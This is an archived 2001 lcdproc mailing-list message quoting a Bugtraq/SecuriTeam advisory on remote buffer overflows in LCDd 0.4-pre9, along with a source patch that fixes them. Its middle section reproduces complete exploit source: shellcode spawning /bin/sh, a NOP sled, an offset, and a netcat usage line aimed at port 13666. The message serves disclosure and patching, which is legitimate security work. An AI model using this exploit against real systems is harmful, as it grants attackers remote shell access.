[lcdproc] LCDd Server Patches
Guillaume Filion
gfk@logidac.com
Wed, 12 Sep 2001 16:57:45 -0400
>Hi!
>
>David Douthitt wrote:
>
>> As for security - if I can get access to your network, I wonder how hard
>> it would be to compromise a box running LCDd on it... with the loopback
>> security patch, a box running LCDd cannot be compromised via LCDd over
>> the network...
>
>
>Ummm...
>http://www.linux-magazin.de/ausgabe/2000/07/InsecurityNews/InsecurityNews.h=
tml
>page is in german, see "Listing 7: lcdproc-exploit.c"
>
>This exploit is for lcdproc 0.4pre9. Has anybody fixed it since then? I
>couldn't find anything about this security hole in the list archive.
>
=46rom http://www.securiteam.com/exploits/5XQ0B000IG.html (extracted
from a BUGTRAQ posting) :
-----
Title 22/4/2000
Remote vulnerability in LCDproc 0.4 (shell access)
Summary
LCDproc (http://lcdproc.omnipotent.net) is a system that is used to
display system information and other data on an LCD display (or any
supported display device, including curses or text). As of version
0.4, the system utilizes a client/server model for communication, and
clients wishing to display data on the LCDproc host device can
connect to the LCDproc server and negotiate a session.
This system is commonly used in embedded server environments and
other locations where system statistics must be available quickly,
but space requirements or other restrictions prevent connecting a
monitor or other display unit. Also, since it must often communicate
with the LCD device, it is commonly installed setuid root or setgid
uucp.
While this system provides for a highly extensible means of
displaying data, the protocol handling code has a few bugs with dire
consequences.
The vulnerabilities in LCDproc allow an attacker to remotely execute
arbitrary code or cause the LCDproc server to crash.
Details
Any system running LCDproc 0.4 or above (including the 0.4-pre
series) that is susceptible to buffer overflow attacks is vulnerable.
The exploit below is only for Linux/x86, and has limited attack
potential, but that does not mean that the scope of the attack is
limited only to that platform.
Remote access can be gained as whatever user and group that LCDproc
is running as.
Temporary Solution:
Disable LCDproc, or downgrade to version 0.3 or before, prior to the
client/server implementation in 0.4.
There is also a patch included in this message which can be applied
against LCDproc version 0.4-pre9 (available from the LCDproc home
site at http://lcdproc.omnipotent.net).
Exploit:
/*****
* lcdproc-exploit.c
*****
*
* LCDproc 0.4-pre9 exploit
#
# Andrew Hobgood <chaos@strange.net>
* Kha0S on #LinuxOS/EFnet
*
* Tested on Linux/x86 2.2.5-15smp (the only Intel box I could get my hands
* on for testing).
*
*****
*/
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#define BUFFERSIZE 269
#define NOP 0x90
#define OFFSET 0xbffff750
char shellcode[] =3D
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89"
"\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c"
"\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff"
"\xff\xff/bin/sh";
int main(int argc, char **argv) {
char *ptr, buffer[BUFFERSIZE];
unsigned long *long_ptr, offset =3D OFFSET;
int aux;
fprintf(stderr, "LCDproc exploit by Andrew Hobgood <chaos@strange.net>\n\n")=
;
fprintf(stderr, "Usage: (%s [<offset>]; cat) | nc <target>
13666\n\n", argv[0]);
if (argc =3D=3D 2) offset +=3D atol(argv[1]);
ptr =3D buffer;
memset(ptr, 0, sizeof(buffer));
memset(ptr, NOP, sizeof(buffer) - strlen(shellcode) - 16);
ptr +=3D sizeof(buffer) - strlen(shellcode) - 16;
memcpy(ptr, shellcode, strlen(shellcode));
ptr +=3D strlen(shellcode);
long_ptr =3D (unsigned long *) ptr;
for(aux=3D0; aux<4; aux++) *(long_ptr++) =3D offset;
ptr =3D (char *) long_ptr;
*ptr =3D '\0';
fprintf(stderr, "Buffer size: %d\n", (int) strlen(buffer));
fprintf(stderr, "Offset: 0x%lx\n\n", offset);
printf("hello\n");
fflush(stdout);
sleep(1);
printf("screen_add {%s}\n", buffer);
fflush(stdout);
return(0);
}
Patch (against 0.4-pre9):
[ This patch is also available at:
http://web.strange.net/patches/lcdproc.20April2000.patch ]
diff -ur ./WHATSNEW ../lcdproc-hacked/WHATSNEW
--- ./WHATSNEW Thu Oct 21 20:04:59 1999
+++ ../lcdproc-hacked/WHATSNEW Thu Apr 20 13:53:54 2000
@@ -11,6 +11,11 @@
* Better syntax for driver parameters
* Dynamically-loaded driver system
+>> Patched for bugs as follows by Andrew Hobgood <chaos@strange.net>:
+ * Three buffer overflows in various locations [screenlist.c, parse.c, othe=
rs]
+ * Prevent too many arguments from walking over the boundary of the fixed
+ client_func argv.
+
V0.4-pre9:
* small fixes for irix
* Added flag in LCDd to shut off server screen:
diff -ur ./server/client_functions.c
=2E./lcdproc-hacked/server/client_functions.c
--- ./server/client_functions.c Thu Oct 21 18:14:21 1999
+++ ../lcdproc-hacked/server/client_functions.c Thu Apr 20 14:12:42 2000
@@ -68,7 +68,7 @@
for(i=3D0; i<argc; i++)
{
- sprintf(str, "test_func_func: %i -> %s\n", i, argv[i]);
+ snprintf(str, 256, "test_func_func: %i -> %s\n", i, argv[i]);
printf(str);
sock_send_string(c->sock, str);
}
@@ -89,7 +89,7 @@
debug("Hello!\n");
- sprintf(str,
+ snprintf(str, 256,
"connect LCDproc %s lcd wid %i hgt %i cellwid %i cellhgt %i\n",
version, lcd.wid, lcd.hgt, lcd.cellwid, lcd.cellhgt);
sock_send_string(c->sock, str);
@@ -193,6 +193,9 @@
}
+ // truncate argv[1] so that it can't be used later to overflow any
+ // buffers. Andrew Hobgood <chaos@strange.net>
+ argv[1][128] =3D 0;
debug("screen_add: Adding screen %s\n", argv[1]);
err =3D screen_add(c, argv[1]);
if(err < 0)
diff -ur ./server/parse.c ../lcdproc-hacked/server/parse.c
--- ./server/parse.c Sat Feb 20 20:53:23 1999
+++ ../lcdproc-hacked/server/parse.c Thu Apr 20 14:06:52 2000
@@ -93,12 +93,21 @@
if(newtoken && str[i])
{
newtoken=3D0;
- argv[argc] =3D str + i;
- argc++;
- }
- else
- {
- }
+ // make sure that we're not going to go over the fixed
+ // number of allowed arguments in argv
+ // Andrew Hobgood <chaos@strange.net>
+ if(argc < 255)
+ {
+ argv[argc] =3D str + i;
+ argc++;
+ } else
+ {
+ debug("Too many arguments, ignoring past 256.\n");
+ }
+ }
+ else
+ {
+ }
}
if(inquote)
{
@@ -135,7 +144,9 @@
if(invalid)
{
// FIXME: Check for buffer overflows here...
- sprintf(errmsg, "huh? Invalid command \"%s\"\n", argv[0]);
+ // You were right -- there was one here. =3D) More or less
+ // fixed: Andrew Hobgood <chaos@strange.net>
+ snprintf(errmsg, 256, "huh? Invalid command \"%s\"\n", argv[0]);
sock_send_string(c->sock, errmsg);
}
diff -ur ./server/screenlist.c ../lcdproc-hacked/server/screenlist.c
--- ./server/screenlist.c Fri Mar 12 00:20:39 1999
+++ ../lcdproc-hacked/server/screenlist.c Thu Apr 20 14:09:03 2000
@@ -116,7 +116,7 @@
c =3D old_s->parent;
if(c) // Tell the client we're not listening any more...
{
- sprintf(str, "ignore %s\n", old_s->id);
+ snprintf(str, 256, "ignore %s\n", old_s->id);
sock_send_string(c->sock, str);
}
else // The server has the display, so do nothing
@@ -131,7 +131,7 @@
c =3D s->parent;
if(c) // Tell the client we're paying attention...
{
- sprintf(str, "listen %s\n", s->id);
+ snprintf(str, 256, "listen %s\n", s->id);
sock_send_string(c->sock, str);
}
else // The server has the display, so do nothing
-----
The original Bugtraq posting (http://lwn.net/2000/0427/a/lcdproc.html) state=
s:
-----
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D
=3D=3D=3D Title: Vulnerability in LCDproc =3D=3D=3D
=3D=3D=3D Date: 20 April 2000 =3D=3D=3D
=3D=3D=3D Author: Andrew Hobgood <chaos@strange.net> =3D=3D=3D
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D
[ Note: The LCDproc maintainers have been notified of this vulnerability, ]
[ and have stated that they are prepared for this advisory to be ]
[ released. ]
-----
Hope this helps,
GFK's
--
Guillaume Filion
Logidac Tech., Beaumont, Qu=E9bec, Canada - http://logidac.com/
PGP Key and more: http://guillaume.filion.org/ (this will redirect)
PGP Fingerprint: 14A6 720A F7BA 6C87 2331 33FD 467E 9198 3DED D5CA
-----------------------------------------------------------
To unsubscribe from this list send a blank message to
lcdproc-unsubscribe@lists.omnipotent.net